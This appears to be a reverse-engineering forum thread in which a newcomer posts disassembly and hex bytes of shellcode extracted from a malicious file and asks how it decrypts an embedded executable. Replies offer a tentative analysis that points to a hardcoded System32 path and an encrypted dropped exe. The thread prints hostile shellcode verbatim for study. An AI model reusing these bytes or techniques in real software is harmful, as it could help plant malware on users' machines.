Skip navigation.
Home

Help understanding she11code asm

Hello everyone, I am new to reversing and hoping someone can point me in the right direction. I have extracted she11code from a bad file and converted the code to ASM. What I am having trouble getting to work/understanding is how they are encrypting/decrypting the embedded file in order to make it harder to extract. I tried xor'ing by 8 and still could not see anything useful. Any help this on how to proceed would be greatly appreciated.
Thanks for the help in advanced.

version = 7
00000000 sbb byte[ebx+0x9318ccd0],dl
00000006 ror ah,0x1
00000008 sbb byte[ebx+0x9318ccd0],dl
0000000e ror ah,0x1
00000010 sbb byte[ebx+0x9318ccd0],dl
00000016 ror ah,0x1
00000018 sbb byte[ebx+0x9318ccd0],dl
0000001e ror ah,0x1
00000020 sbb byte[ebx+0x9318ccd0],dl
00000026 ror ah,0x1
00000028 sbb byte[ebx+0x9318ccd0],dl
0000002e ror ah,0x1
00000030 sbb byte[ebx+0x9318ccd0],dl
00000036 ror ah,0x1
00000038 sbb byte[ebx+0x9318ccd0],dl
0000003e ror ah,0x1
00000040 sbb byte[ebx+0x9318ccd0],dl
00000046 ror ah,0x1
00000048 sbb byte[ebx+0x9318ccd0],dl
0000004e ror ah,0x1
00000050 sbb byte[ebx+0x9318ccd0],dl
00000056 ror ah,0x1
00000058 sbb byte[ebx+0x9318ccd0],dl
0000005e ror ah,0x1
00000060 sbb byte[ebx+0x9318ccd0],dl
00000066 ror ah,0x1
00000068 sbb byte[ebx+0x9318ccd0],dl
0000006e ror ah,0x1
00000070 sbb byte[ebx+0x9318ccd0],dl
00000076 ror ah,0x1
00000078 sbb byte[ebx+0x9318ccd0],dl
0000007e ror ah,0x1
00000080 sbb byte[ebx+0x9318ccd0],dl
00000086 ror ah,0x1
00000088 sbb byte[ebx+0x9318ccd0],dl
0000008e ror ah,0x1

version = 8
00000000 or dl,ah
00000002 cdq
00000003 xor al,0x8
00000005 loop 0xffffffa0
00000007 xor al,0x8
00000009 loop 0xffffffa4
0000000b xor al,0x8
0000000d loop 0xffffffa8
0000000f xor al,0x8
00000011 loop 0xffffffac
00000013 xor al,0x8
00000015 loop 0xffffffb0
00000017 xor al,0x8
00000019 loop 0xffffffb4
0000001b xor al,0x8
0000001d loop 0xffffffb8
0000001f xor al,0x8
00000021 loop 0xffffffbc
00000023 xor al,0x8
00000025 loop 0xffffffc0
00000027 xor al,0x8
00000029 loop 0xffffffc4
0000002b xor al,0x8
0000002d loop 0xffffffc8
0000002f xor al,0x8
00000031 loop 0xffffffcc
00000033 xor al,0x8
00000035 loop 0xffffffd0
00000037 xor al,0x8
00000039 loop 0xffffffd4
0000003b xor al,0x8
0000003d loop 0xffffffd8
0000003f xor al,0x8
00000041 loop 0xffffffdc
00000043 xor al,0x8
00000045 loop 0xffffffe0
00000047 xor al,0x8
00000049 loop 0xffffffe4
0000004b xor al,0x8
0000004d loop 0xffffffe8
0000004f xor al,0x8
00000051 loop 0xffffffec
00000053 xor al,0x8
00000055 loop 0xfffffff0
00000057 xor al,0x8
00000059 loop 0xfffffff4
0000005b xor al,0x8
0000005d loop 0xfffffff8
0000005f xor al,0x8
00000061 loop 0xfffffffc
00000063 xor al,0x8
00000065 loop 0x0
00000067 xor al,0x8
00000069 loop 0x4
0000006b xor al,0x8
0000006d loop 0x8
0000006f xor al,0x8
00000071 loop 0xc
00000073 xor al,0x8
00000075 loop 0x10
00000077 xor al,0x8
00000079 loop 0x14
0000007b xor al,0x8
0000007d loop 0x18
0000007f xor al,0x8
00000081 loop 0x1c
00000083 xor al,0x8
00000085 loop 0x20
00000087 xor al,0x8
00000089 loop 0x24
0000008b xor al,0x8
0000008d loop 0x28

Shellcode review

1) It's decrypting something. There is no jmp, no call, no API hash, nothing... It's just decrypting something in heavy way!

2) Send complete shellcode

3) Send bytes in HEX. Send only HEX string of entire shellcode, like this: AABBCCDDEEFF01 etc.

full code

Thanks for the reply. I've pasted the entire code below. Any help/tips on how to acquire/decrypt the embedded malwre would be greatly appreciated.

Thanks again for your time and help.


e8fc00440000458b8b3c057c01788bef184f5f8b012049eb348b018b31ee99c084ac74c0c1070dcac201f4eb543b0424e5755f8b012466eb0c8b8b4b1c5feb011c8b018b89eb245cc304315f60f66456468b8b300c40708bad1c688b890883f86ac068508af05f0498688afe570ee7ff3a43575c4e494f445357735c73796574336d5c326163636c652e657841009090

e8fc00440000458b8b3c057c01788bef184f5f8b012049eb348b018b31ee99c084ac74c0c1070dcac201f4eb543b0424e5755f8b012466eb0c8b8b4b1c5feb011c8b018b89eb245cc304315f60f66456468b8b300c40708bad1c688b890883f86ac068508af05f0498688afe570ee7ff3a43575c4e494f445357735c73796574336d5c326163636c652e657841009090

9318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd0

9318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd09318ccd0

2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a2c5c666a

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

4ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b00

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

4ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b004ee89b00

e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499e2083499

when you hexdecode the first

when you hexdecode the first line we see "....ÿ:CW\NIODSWs\syet3m\2accle.exA..." probably a hint to code a decryptor

Analyze results

Hi

Analyzing shellcode without entire exploit is not something 100% possible. This shellcode have hardcoded System32 path with exename:
C:\Windows\System32\caclA.exe

It's not something good, it seems a noob coded this shellcode, instead of using GetSystemDirectory API with a simple call, shellcode writer decided to write it manually.

So if you don't have C:\Windows\System32 folder I think it will not work!

It tries to call
KERNEL32.GlobalLock
KERNEL32.GlobalSize

But I have not determined 100% what it tries to do, also it have a lot of

01001248 5C POP ESP
01001249 66:6A 2C PUSH 2C
0100124C 5C POP ESP
0100124D 66:6A 2C PUSH 2C
01001250 5C POP ESP
01001251 66:6A 2C PUSH 2C
01001254 5C POP ESP
01001255 66:6A 2C PUSH 2C
01001258 5C POP ESP
01001259 66:6A 2C PUSH 2C
0100125C 5C POP ESP
0100125D 66:6A 2C PUSH 2C
01001260 5C POP ESP
01001261 66:6A 2C PUSH 2C
01001264 5C POP ESP
01001265 66:6A 2C PUSH 2C
01001268 5C POP ESP
01001269 66:6A 2C PUSH 2C
0100126C 5C POP ESP
0100126D 66:6A 2C PUSH 2C
01001270 5C POP ESP
01001271 66:6A 2C PUSH 2C
01001274 5C POP ESP
01001275 66:6A 2C PUSH 2C
01001278 5C POP ESP
01001279 66:6A 2C PUSH 2C
0100127C 5C POP ESP
0100127D 66:6A 2C PUSH 2C
01001280 5C POP ESP
01001281 66:6A 2C PUSH 2C
01001284 5C POP ESP
01001285 66:6A 2C PUSH 2C
01001288 5C POP ESP
01001289 66:6A 2C PUSH 2C
0100128C 5C POP ESP
0100128D 66:6A 2C PUSH 2C
01001290 5C POP ESP
01001291 66:6A 2C PUSH 2C
01001294 5C POP ESP
01001295 66:6A 2C PUSH 2C
01001298 5C POP ESP
01001299 66:6A 2C PUSH 2C
0100129C 5C POP ESP
0100129D 66:6A 2C PUSH 2C
010012A0 5C POP ESP
010012A1 66:6A 2C PUSH 2C
010012A4 5C POP ESP
010012A5 66:6A 2C PUSH 2C
010012A8 5C POP ESP
010012A9 66:6A 2C PUSH 2C
010012AC 5C POP ESP
010012AD 66:6A 2C PUSH 2C
010012B0 5C POP ESP
010012B1 66:6A 2C PUSH 2C
010012B4 5C POP ESP
010012B5 66:6A 2C PUSH 2C
010012B8 5C POP ESP
010012B9 66:6A 2C PUSH 2C
010012BC 5C POP ESP
010012BD 66:6A 2C PUSH 2C
010012C0 5C POP ESP
010012C1 66:6A 2C PUSH 2C
010012C4 5C POP ESP
010012C5 66:6A 2C PUSH 2C
010012C8 5C POP ESP
010012C9 66:6A 2C PUSH 2C
010012CC 5C POP ESP
010012CD 66:6A 2C PUSH 2C
010012D0 5C POP ESP
010012D1 66:6A 2C PUSH 2C
010012D4 5C POP ESP

It doesn't mean something normal...

I should have entire exploit to analyze the exploit, shellcode and what it does... But 100% it have an embedded exe file, it writes to system32 folder, exe is encrypted and it decrypts the file.

Also I can't see call to WinExec, so even after decrypting or writing, I can't see any execution code.

Also maybe you cut shellcode wrong or I should have original exploit file to analyze.

Regards

samp

What's your email address I can send to?

xanalyzer [at] yahoo [dot]

xanalyzer [at] yahoo [dot] com

PI

Maybe the unencrypted she11code is injected into a process and executed with a ResumeThread call or something. The use of WinExec is actually fairly rare these days.